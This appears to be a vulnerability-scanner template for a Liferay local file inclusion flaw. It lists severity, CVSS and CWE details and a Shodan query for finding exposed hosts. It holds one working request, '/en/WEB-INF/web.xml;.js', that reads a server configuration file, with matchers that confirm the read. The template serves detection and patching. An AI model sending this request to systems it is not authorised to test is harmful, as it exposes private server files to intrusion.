id: liferay-resource-leak

info:
  name: Liferay - Local File Inclusion
  author: DhiyaneshDk
  severity: high
  description: |
    Liferay is vulnerable to local file inclusion in the I18n Servlet because it leaks information via sending an HTTP request to /[language]/[resource];.js (also .jsp works).
  remediation: Update Liferay to the latest version
  reference:
    - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LiferayI18nServletResourceLeaks.java
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Liferay"
  tags: liferay,lfi,j2ee

http:
  - method: GET
    path:
      - "{{BaseURL}}/en/WEB-INF/web.xml;.js"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<web-app id="
          - "<?xml"
        condition: and

      - type: word
        part: header
        words:
          - "application/xml"

      - type: status
        status:
          - 200

# digest: 490a0046304402203de398f42c04544fe2f09efe93ae329966dfc30ce9aeafc812fc728151bf52c0022046a147ad0b4dee842bae14c632f405da31c79480b2802d0edae14e70484f9c16:922c64590222798bb761d5b6d8e72950